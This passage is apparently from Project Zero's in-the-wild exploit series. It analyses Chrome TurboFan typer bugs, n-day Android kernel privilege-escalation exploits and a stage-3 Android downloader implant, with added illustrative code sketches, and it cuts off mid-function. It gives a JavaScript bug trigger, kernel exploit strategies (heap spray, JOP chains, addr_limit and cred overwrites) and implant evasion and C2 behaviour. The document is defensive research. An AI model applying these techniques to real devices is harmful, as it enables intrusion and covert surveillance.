This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }
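The loop header can be replayed with IEEE-754 doubles, which behave like JavaScript numbers for these operations. The struct and function names are hypothetical, and the code must be built without -ffast-math, which would let the compiler assume NaN never occurs.

```cpp
#include <cassert>
#include <cmath>
#include <limits>
#include <vector>

struct LoopTrace {
  std::vector<double> body_values;  // values of i observed inside the loop body
  double final_value;               // value of i after the loop exits
};

// Executes `for (i = -Infinity; i < 0; i += Infinity)` and records i.
LoopTrace RunInductionLoop() {
  const double inf = std::numeric_limits<double>::infinity();
  LoopTrace trace{{}, 0.0};
  double i = -inf;
  for (; i < 0; i += inf) {
    trace.body_values.push_back(i);
  }
  trace.final_value = i;
  return trace;
}
```

Since -Infinity + Infinity is NaN, i holds -Infinity in the body, becomes NaN on the first increment, and the loop exits because NaN < 0 is false. A type for i that only covers numeric ranges misses that NaN.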

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.
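The marker technique can be sketched as a scan over a snapshot of heap words for the pattern marker, value, marker. The function, the 64-bit word view of memory, and the marker values are assumptions for illustration; a real exploit would also have to account for V8's tagging and pointer compression.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Returns the word sandwiched between two copies of `marker`, i.e. the
// pointer that was placed between the marker values, if the pattern exists.
std::optional<std::uint64_t> FindBetweenMarkers(const std::vector<std::uint64_t>& words,
                                                std::uint64_t marker) {
  for (std::size_t i = 0; i + 2 < words.size(); ++i) {
    if (words[i] == marker && words[i + 2] == marker) {
      return words[i + 1];
    }
  }
  return std::nullopt;
}
```

Compared with a precomputed offset, the scan keeps working even if unrelated allocations shift the object by a few words.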

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.


The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate how many resources such attackers are willing to spend on making their exploits extra reliable; the clearest evidence is that the actor twice switched from an already high-quality 0-day to a slightly better vulnerability.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2014, when Chrome 37 came out, the exploit for CVE-2017-5070 would have been considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

In-the-Wild Series: Android Exploits

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020


After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we get through those, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering, it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array that registers it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework.

Each of the "xyz_register" functions adds an entry to the global list containing a probe function, used to check whether the device is vulnerable to the given exploit and to estimate the likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.
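The registration pattern can be sketched in C++ as follows. Everything here is hypothetical: DeviceInfo, the scores, and the exploit names are invented, and GCC/Clang's constructor attribute is used as one common way to get a function into .init_array on ELF targets. The function-local static registry avoids depending on the order in which those functions run.

```cpp
#include <cassert>
#include <string>
#include <vector>

// Hypothetical description of the target, filled in at runtime.
struct DeviceInfo {
  std::string kernel_version;
  bool has_pxn;
};

struct ExploitEntry {
  const char* name;
  int (*probe)(const DeviceInfo&);    // 0 = not applicable, higher = more likely to succeed
  bool (*exploit)(const DeviceInfo&);
};

// Function-local static: safe to use from constructors that run before main().
std::vector<ExploitEntry>& Registry() {
  static std::vector<ExploitEntry> entries;
  return entries;
}

// Placeholder probes with made-up scores, and an exploit stub that does nothing.
int ProbeNeedsNoPxn(const DeviceInfo& d) { return d.has_pxn ? 0 : 80; }
int ProbeGeneric(const DeviceInfo&) { return 50; }
bool ExploitStub(const DeviceInfo&) { return false; }

// Each "register" function adds its entry before main() runs.
__attribute__((constructor)) static void RegisterNeedsNoPxn() {
  Registry().push_back({"needs_no_pxn", ProbeNeedsNoPxn, ExploitStub});
}
__attribute__((constructor)) static void RegisterGeneric() {
  Registry().push_back({"generic", ProbeGeneric, ExploitStub});
}

// Picks the registered exploit whose probe reports the best chance of success.
const ExploitEntry* SelectBestExploit(const DeviceInfo& device) {
  const ExploitEntry* best = nullptr;
  int best_score = 0;
  for (const ExploitEntry& entry : Registry()) {
    int score = entry.probe(device);
    if (score > best_score) {
      best = &entry;
      best_score = score;
    }
  }
  return best;
}
```

Adding another exploit then only requires one more probe/exploit pair and one more registration function; the selection logic never changes.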


Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.
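A simplified model of the check that addr_limit controls: before copying to or from a caller-supplied pointer, the kernel verifies that the range lies below the current thread's limit. The struct, function, and constants below are hypothetical and illustrative; real kernels implement the check per architecture with slightly different boundary conventions.

```cpp
#include <cassert>
#include <cstdint>

// Simplified stand-in for the per-thread limit consulted before user copies.
struct ThreadLimits {
  std::uint64_t addr_limit;
};

// True if addr + size <= addr_limit, computed without integer overflow.
bool AccessOk(const ThreadLimits& t, std::uint64_t addr, std::uint64_t size) {
  return size <= t.addr_limit && addr <= t.addr_limit - size;
}
```

Raising the limit to the top of the address space is what lets a kernel address pass, so an ordinary pipe read or write then copies to or from kernel memory.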


The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.

Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".


The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is a direct copy-paste.


The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.


The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".


The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN Lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".


The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.


The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root"; Baidu Security Lab "KARMA shows you offense and defense".


Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps the exploit server URLs that we had access to were specifically configured for a user who they know uses an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long after their original manufacturers stopped supporting them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

In-the-Wild Series: Android Post-Exploitation

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020


This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will refer to the different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3, is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!


Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been run by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section.

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and point them to /dev/null. This prevents output messages from appearing, which might otherwise lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.
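The closing rules can be written as a pure predicate over a descriptor number and its /proc/self/fd symlink target. ShouldCloseFd is a hypothetical name, and because the wording of the last rule is ambiguous, this sketch assumes that it, like the socket rule, applies only to descriptors above 32.

```cpp
#include <cassert>
#include <string>

// Returns true if, under the assumptions above, descriptor `fd` whose
// /proc/self/fd symlink points at `link` would be closed.
bool ShouldCloseFd(int fd, const std::string& link) {
  auto contains = [&link](const char* needle) {
    return link.find(needle) != std::string::npos;
  };
  // Pipes and anonymous inodes are closed regardless of the descriptor number.
  if (contains("pipe:") || contains("anon_inode:")) return true;
  if (fd > 32) {
    if (contains("socket:")) return true;
    // Assumed reading: high descriptors survive only if they point into
    // /data/dalvik-cache/arm or /dev/.
    if (!contains("/data/dalvik-cache/arm") && !contains("/dev/")) return true;
  }
  return false;
}
```

Under this reading, descriptors 0-2 survive because after the redirection they point at /dev/null.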

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download and execute the next stage. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, organized by category.


Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a string obfuscation technique similar to stage 2's. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function. The binary uses AES to encrypt its static configuration settings, its communications with the C2, and a hash table that stores dynamic configuration settings. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory and what file descriptors it has opened, and sends very detailed information to the C2 server.
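The opaque-key table can be sketched with 16-byte arrays as keys. KeyHash uses FNV-1a purely as a stand-in because the binary's hashing function is not described, and all names are hypothetical; a 0x140-byte keys block, the size given for it in the Hashtable Encryption section, splits into 20 such keys.

```cpp
#include <algorithm>
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <unordered_map>
#include <vector>

using Key = std::array<std::uint8_t, 16>;

// FNV-1a (64-bit) over the 16 key bytes; a stand-in for the unknown real hash.
struct KeyHash {
  std::size_t operator()(const Key& key) const {
    std::uint64_t h = 14695981039346656037ull;  // FNV offset basis
    for (std::uint8_t b : key) {
      h ^= b;
      h *= 1099511628211ull;  // FNV prime
    }
    return static_cast<std::size_t>(h);
  }
};

// Splits a decrypted keys block into consecutive 16-byte keys (trailing bytes ignored).
std::vector<Key> SplitKeysBlock(const std::vector<std::uint8_t>& block) {
  std::vector<Key> keys;
  for (std::size_t off = 0; off + 16 <= block.size(); off += 16) {
    Key key{};
    std::copy_n(block.begin() + static_cast<std::ptrdiff_t>(off), 16, key.begin());
    keys.push_back(key);
  }
  return keys;
}

// Settings/status values stored under opaque keys instead of descriptive strings.
using SettingsTable = std::unordered_map<Key, std::string, KeyHash>;
```

Because the keys carry no meaning on their own, an analyst looking at the table sees only which opaque key is used where, not what each setting represents.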

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.
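Locating candidate strings is straightforward given the marker. This sketch assumes, beyond what the text states, that obfuscated strings are NUL-terminated and contain no embedded NUL bytes. It only finds them; the deobfuscation routine itself is not described and was handled by emulation.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <string_view>
#include <vector>

// Returns the start offsets of NUL-terminated strings in `data` that end with
// the "~~~" (0x7E7E7E) marker. It does not decode them.
std::vector<std::size_t> FindObfuscatedStrings(std::string_view data) {
  constexpr std::string_view kMarker = "~~~";
  std::vector<std::size_t> offsets;
  std::size_t start = 0;
  while (start < data.size()) {
    std::size_t end = data.find('\0', start);
    if (end == std::string_view::npos) end = data.size();
    std::string_view candidate = data.substr(start, end - start);
    if (candidate.size() >= kMarker.size() &&
        candidate.substr(candidate.size() - kMarker.size()) == kMarker) {
      offsets.push_back(start);
    }
    start = end + 1;  // skip past the terminating NUL
  }
  return offsets;
}
```

The resulting offsets are the kind of input an emulation-based script would then feed, one by one, to the deobfuscation function.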

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server URL, the user-agent to use when contacting the C2 server, version information, and more. Prior to returning from the main control function, the code overwrites the decrypted data block with zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%
00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-
00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#
00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.
00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....
00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\
00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.
00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.
00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w
00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....
000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A
000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu
000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#
000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....
000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........
000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.
00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]
00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a
00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..
00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values, such as status and configuration. The code initializes a CRC table, which is used in the hashing algorithm, and then initializes the hash table. The structure that manages the hash table is shown below:

struct hashtable_mgr {
    int * hashtable_ptr;   // heap buffer, 0x1400 bytes when first initialized
    int maxEntries;
    int numEntries;
};


The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions used to interact with this hash table throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: a pointer to the hashtable manager, a pointer to the key (usually expressed as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Throughout the rest of this post, I will refer to values stored in the hash table by their key’s offset. Because each key is a series of 0x10 bytes, I will write, for example, “the value for offset 0x20 in the hash table”. This means the value stored in the hash table for the 0x10-byte “key” that begins at the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {
    BYTE * key_ptr;
    uint key_len;
    uint in_use;
    BYTE * value_ptr;
    uint value_len;
};
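The sketch below shows how a hash table built from these two structures could work. It is an assumption-laden illustration, not the binary’s code: the CRC-32 variant (standard reflected IEEE polynomial), linear probing on collisions, and the bucket count are guesses, and ht_init and ht_find are hypothetical names. The bucket count of 256 is chosen because 0x1400 bytes divided by a 0x14-byte entry (the size of this struct with 32-bit pointers) gives 256; the real capacity is not stated. Only the entry fields, the 0x10-byte keys, and the four-argument get/put shape come from the analysis above.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define KEY_LEN 0x10      /* each key is 0x10 bytes of the decrypted keys block */
#define NUM_BUCKETS 256   /* assumption: 0x1400 / 0x14-byte entries */

/* Bitwise CRC-32 (reflected, polynomial 0xEDB88320). Assumed variant. */
static uint32_t crc32_ieee(const uint8_t *p, size_t n) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

struct hashtable_entry {
    const uint8_t *key_ptr;   /* key bytes (not copied) */
    uint32_t key_len;
    uint32_t in_use;
    uint8_t *value_ptr;       /* heap copy of the stored value */
    uint32_t value_len;
};

struct hashtable_mgr {
    struct hashtable_entry *hashtable_ptr;
    int maxEntries;
    int numEntries;
};

int ht_init(struct hashtable_mgr *m) {
    m->hashtable_ptr = calloc(NUM_BUCKETS, sizeof *m->hashtable_ptr);
    m->maxEntries = NUM_BUCKETS;
    m->numEntries = 0;
    return m->hashtable_ptr ? 0 : -1;
}

/* Probe linearly from crc32(key) % maxEntries. Returns the matching entry,
 * or the first free slot if create is set; NULL otherwise. */
static struct hashtable_entry *ht_find(struct hashtable_mgr *m,
                                       const uint8_t *key, int create) {
    uint32_t cap = (uint32_t)m->maxEntries;
    uint32_t start = crc32_ieee(key, KEY_LEN) % cap;
    for (uint32_t i = 0; i < cap; i++) {
        struct hashtable_entry *e = &m->hashtable_ptr[(start + i) % cap];
        if (!e->in_use)
            return create ? e : NULL;
        if (memcmp(e->key_ptr, key, KEY_LEN) == 0)
            return e;
    }
    return NULL;
}

int putValueInHashtable(struct hashtable_mgr *m, const uint8_t *key,
                        const void *value, uint32_t value_len) {
    struct hashtable_entry *e = ht_find(m, key, 1);
    uint8_t *copy;
    if (!e || !(copy = malloc(value_len ? value_len : 1)))
        return -1;
    if (value_len)
        memcpy(copy, value, value_len);
    if (e->in_use) {
        free(e->value_ptr);              /* replace an existing value */
    } else {
        e->key_ptr = key;
        e->key_len = KEY_LEN;
        e->in_use = 1;
        m->numEntries++;
    }
    e->value_ptr = copy;
    e->value_len = value_len;
    return 0;
}

/* Copies at most value_len bytes; returns the number copied, or -1. */
int getValueFromHashtable(struct hashtable_mgr *m, const uint8_t *key,
                          void *value, uint32_t value_len) {
    struct hashtable_entry *e = ht_find(m, key, 0);
    if (!e)
        return -1;
    uint32_t n = e->value_len < value_len ? e->value_len : value_len;
    memcpy(value, e->value_ptr, n);
    return (int)n;
}
```

Reading “the value for offset 0x20” then amounts to calling getValueFromHashtable with keys_block + 0x20 as the key pointer.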


I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of, such as the filename under which stage 4 is saved and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code records the current time in a file named state.parcel. After recording the current time at the beginning of the file, it checks how many times per day this has been done by reading all of the times currently in the file. If there are fewer than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and at least 5 entries for each of the previous 3 days, the binary sets a variable that tells the code to clean up and exit. If there are 6 entries for the current day and at least one entry for each of the past 3 days, the binary cleans up the persistent files for both this and other stages and then does a maximum sleep: sleep(0xFFFFFFFF), which is 4,294,967,295 seconds, or just over 136 years.
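The day-counting rules above can be expressed as a small decision function. This is a hedged sketch: tally_days and check_parcel are hypothetical names, days are bucketed on UTC midnight boundaries (an assumption), and the outcome for six entries today without the required history on earlier days is not described, so the sketch reports it separately.

```c
#include <stddef.h>
#include <stdint.h>

enum parcel_action {
    PARCEL_PROCEED,        /* fewer than 6 runs recorded today */
    PARCEL_CLEANUP_EXIT,   /* 6 today and >= 5 on each of the 3 previous days */
    PARCEL_CLEANUP_SLEEP,  /* 6 today and >= 1 on each of the 3 previous days */
    PARCEL_UNSPECIFIED     /* 6 today otherwise: behavior not described */
};

/* counts[0] = runs today, counts[1..3] = runs 1, 2, and 3 days ago. */
void tally_days(const uint32_t *times, size_t n, uint32_t now,
                unsigned counts[4]) {
    uint32_t today = now / 86400u;
    for (int d = 0; d < 4; d++)
        counts[d] = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t day = times[i] / 86400u;
        if (day <= today && today - day < 4)
            counts[today - day]++;
    }
}

/* The checks are applied in the order the analysis gives them. */
enum parcel_action check_parcel(const unsigned counts[4]) {
    if (counts[0] < 6)
        return PARCEL_PROCEED;
    int all_ge5 = 1, all_ge1 = 1;
    for (int d = 1; d <= 3; d++) {
        if (counts[d] < 5) all_ge5 = 0;
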